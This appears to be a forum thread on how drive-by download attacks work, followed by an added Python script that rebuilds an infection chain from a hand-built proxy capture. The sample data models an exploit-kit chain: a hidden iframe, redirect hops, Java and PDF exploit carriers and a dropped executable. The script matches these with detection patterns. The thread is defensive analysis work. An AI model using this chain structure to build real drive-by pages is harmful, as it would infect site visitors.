Fully understanding specific "Drive-by download" behavior

ansar313

New Member
Thread author
May 20, 2013
Hello to all,
I have little skill in English writing. Excuse me :)
I am trying to understand a specific malware behavior that is used by "Drive-by downloads".
Especially these questions:
1. What file is downloaded in the attack?
2. What exploit is used in the attack?
3. What domain is redirected to, etc.
For example, in the BLADE evaluation lab, some malware URLs are listed that use drive-by downloads.
http://www.blade-defender.org/eval-lab/
I want to understand the exact attack scenario, step by step, of each URL listed in BLADE.

Notice: there are many websites that make reports with full detail, but they don't describe the mechanism. Please help me!

Jack

Administrator
Jan 24, 2011
RE: Fully understanding specific Drive-by download behavior

Here is how a drive-by download and exploit work to infect internet users:

The Blackhole Exploit Kit

iFrame drive-by attack demo (video): http://www.youtube.com/watch?&v=_cBed6-ufIQ
Adobe Reader vulnerability demo

ansar313

New Member
Thread author
May 20, 2013
RE: Fully understanding specific Drive-by download behavior

Dear Jack,
thanks a lot,
but my question is something else:
is there software or a website that we can give a malware URL and it gives us a report that describes the attack scenario step by step?
Please help me.

Ink

Administrator
Jan 8, 2011
I believe a drive-by download relies on vulnerabilities where the targeted software has an unpatched/open exploit, i.e. IE6, older Flash Player or Java (plus much other software), and a specially crafted webpage takes advantage of it, without user interaction.

Other forms could use social engineering, by tricking the user into downloading files and luring them into executing them (i.e. double extension).

However, modern browsers today provide anti-phishing/malware protection, and keeping your plugins updated helps keep your PC secure against the latest attacks.

PS: Correct me if I'm wrong.

jamescv7

Mar 15, 2011
The files downloaded are first temp files, which are likely legit, and these then drop others until an executable appears.

Using a program like Fiddler, you can monitor those modifications in that type of attack.
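The behavior Ink outlines (crafted page, vulnerable plugin, no user interaction) and the Fiddler capture jamescv7 points to can be tied together in a script. Below is an added example, written for this page and not taken from the thread, from BLADE or from Fiddler: it takes an ordered list of captured HTTP sessions, as you would export them after loading a suspect URL through a proxy in a throwaway VM, and rebuilds the step-by-step scenario the thread author asked for. It flags the injected hidden iframe, the HTTP 302, meta-refresh and JavaScript redirects between domains, the plugin content the landing page pulls in, and identifies downloaded files by magic bytes rather than by URL or Content-Type. The capture in SESSIONS is constructed by hand and every host name in it is invented.

```python
# Added example for this thread, not code from the posts, BLADE or Fiddler.
# SESSIONS is a hand-constructed capture shaped like a Fiddler export of one
# infection, in the order the proxy recorded it; every host name is invented.
import re
from urllib.parse import urljoin, urlparse

SESSIONS = [  # (url, status, response headers, response body)
    ("http://legit-news.example/index.html", 200, {"Content-Type": "text/html"},
     b'<html><body>News...<iframe src="http://ad-cdn.example/r.php" '
     b'width="1" height="1" style="visibility:hidden"></iframe></body></html>'),
    ("http://ad-cdn.example/r.php", 302, {"Location": "http://tds.example/go?id=7"}, b""),
    ("http://tds.example/go?id=7", 200, {"Content-Type": "text/html"},
     b'<html><head><meta http-equiv="refresh" '
     b'content="0;url=http://land.example/main.php"></head></html>'),
    ("http://land.example/main.php", 200, {"Content-Type": "text/html"},
     b'<html><body><applet code="Ex.class" archive="http://land.example/a.jar"></applet>'
     b'<iframe src="http://land.example/p.pdf" width=0 height=0></iframe>'
     b'<script>document.location="http://land.example/w.php?f=1";</script></body></html>'),
    ("http://land.example/a.jar", 200, {"Content-Type": "application/java-archive"}, b"PK\x03\x04..."),
    ("http://land.example/p.pdf", 200, {"Content-Type": "application/pdf"}, b"%PDF-1.4 ..."),
    ("http://land.example/w.php?f=1", 200, {"Content-Type": "application/octet-stream"}, b"MZ\x90\x00..."),
]

REDIRECT_STATUSES = {301, 302, 303, 307, 308}
# (magic bytes, description, role): a carrier is opened by a vulnerable plugin, the payload is what gets dropped
MAGIC = [
    (b"MZ", "Windows PE executable", "payload"),
    (b"%PDF", "PDF document", "exploit carrier"),
    (b"PK\x03\x04", "ZIP/JAR archive", "exploit carrier"),
    (b"CWS", "Flash SWF (compressed)", "exploit carrier"),
]
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
PLUGIN_RE = re.compile(r"<(applet|embed|object)\b[^>]*>", re.I)
SRC_RE = re.compile(r"""\b(?:src|archive|data)\s*=\s*["']?([^"'\s>]+)""", re.I)
DIM_RE = re.compile(r"""\b(width|height)\s*=\s*["']?(\d+)""", re.I)
HIDDEN_STYLE_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
META_REFRESH_RE = re.compile(r"""<meta\b[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*"""
                             r"""content\s*=\s*["']?\s*\d+\s*;\s*url\s*=\s*([^"'\s>]+)""", re.I)
JS_LOCATION_RE = re.compile(r"""(?:document|window)\.location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.I)

def file_type(body):
    """Identify a body by magic bytes; never trust Content-Type or the URL's extension."""
    for magic, name, role in MAGIC:
        if body.startswith(magic):
            return name, role
    return None

def iframe_is_hidden(tag):
    """0x0 / 1x1 or CSS-hidden frames are the classic injected drive-by iframe."""
    dims = {k.lower(): int(v) for k, v in DIM_RE.findall(tag)}
    return any(dims.get(d, 999) <= 1 for d in ("width", "height")) or bool(HIDDEN_STYLE_RE.search(tag))

def analyze_session(url, status, headers, body):
    events = []  # (event, target) pairs describing what this one response did
    if status in REDIRECT_STATUSES and "Location" in headers:
        events.append((f"http {status} redirect", urljoin(url, headers["Location"])))
    if headers.get("Content-Type", "").startswith("text/html"):
        html = body.decode("latin-1", errors="replace")
        for m in IFRAME_RE.finditer(html):
            src = SRC_RE.search(m.group(0))
            if src:
                kind = "hidden iframe" if iframe_is_hidden(m.group(0)) else "iframe"
                events.append((kind, urljoin(url, src.group(1))))
        for label, rx in (("meta refresh", META_REFRESH_RE), ("javascript redirect", JS_LOCATION_RE)):
            for m in rx.finditer(html):
                events.append((label, urljoin(url, m.group(1))))
        for m in PLUGIN_RE.finditer(html):
            src = SRC_RE.search(m.group(0))
            if src:
                events.append((f"{m.group(1).lower()} loads", urljoin(url, src.group(1))))
    elif file_type(body):
        name, role = file_type(body)
        events.append((f"download ({role}): {name}", url))
    return events

def reconstruct_chain(sessions):
    steps = []
    for n, (url, status, headers, body) in enumerate(sessions, 1):
        for event, target in analyze_session(url, status, headers, body):
            steps.append({"step": n, "from": urlparse(url).hostname, "event": event, "target": target})
    return steps

def summarize(steps):
    """The thread's three questions: domains in the chain, exploit carriers, final payload."""
    domains = []
    for s in steps:
        for h in (s["from"], urlparse(s["target"]).hostname):
            if h and h not in domains:
                domains.append(h)
    return {"domains": domains,
            "exploit_carriers": [s["target"] for s in steps if "(exploit carrier)" in s["event"]],
            "payloads": [s["target"] for s in steps if "(payload)" in s["event"]]}

if __name__ == "__main__":
    chain = reconstruct_chain(SESSIONS)
    for s in chain:
        print(f"[{s['step']}] {s['from']}: {s['event']} -> {s['target']}")
    print(summarize(chain))
```

Run directly, it prints one line per observed step and then the domain list, the carriers and the payload. The HTTP-level events (status redirects, downloads) come from the proxy log and so survive whatever the landing page does to hide itself; the in-page matching of iframes, meta refresh and document.location is a plain-text pass and will miss the heavily obfuscated JavaScript that exploit-kit landing pages normally use. That limitation is exactly why a sandbox that actually executes the page is the better answer to the "give it a URL, get a step-by-step report" question raised above.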
